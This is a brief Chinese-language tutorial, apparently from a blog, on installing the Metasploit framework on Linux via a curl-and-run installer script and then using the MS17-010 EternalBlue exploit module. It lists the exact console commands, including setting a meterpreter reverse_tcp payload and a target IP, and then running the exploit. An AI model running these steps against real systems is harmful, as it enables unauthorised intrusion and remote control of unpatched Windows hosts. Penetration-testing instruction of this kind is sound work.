1. 程式人生 > 實用技巧 >Metasploit簡單使用——安裝和簡單使用

Metasploit簡單使用——安裝和簡單使用

以下是非kali的Linux下安裝MSF框架

一鍵安裝

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall   
adduser msf           #新增msf使用者
su msf                #切換到msf使用者
cd  /opt/metasploit-framework/bin   #切換到msf所在的目錄 
.
/msfconsole #以後啟動msfconsole,都切換到msf使用者下啟動,這樣會同步資料庫。如果使用root使用者啟動的話,不會同步資料庫 也可以將msfconsole加入到執行目錄下,這樣在任何目錄直接msfconsole就可以了 ln -s /opt/metasploit-framework/bin/msfconsole /usr/bin/msfconsole #備註: #初次執行msf會建立資料庫,但是msf預設使用的PostgreSQL資料庫不能與root使用者關聯,這也這也就是需要新建使用者msf來執行metasploit的原因所在。如果你一不小心手一抖,初次執行是在root使用者下,請使用 msfdb reinit 命令,然後使用非root使用者初始化資料庫。 MSF後期的升級:msfupdate

使用方法(永恆之藍為例):

  • 進入框架:msfconsole

  • 使用search命令查詢相關漏洞:searchms17-010

  • 使用use進入模組:use exploit/windows/smb/ms17_010_eternalblue

  • 使用info檢視模組資訊:info

  • 設定攻擊載荷:set payload windows/x64/meterpreter/reverse_tcp

  • 檢視模組需要配置的引數:show options

  • 設定引數:set RHOST 192.168.2.123(目標IP)

  • 攻擊:exploit / run

  • 後滲透階段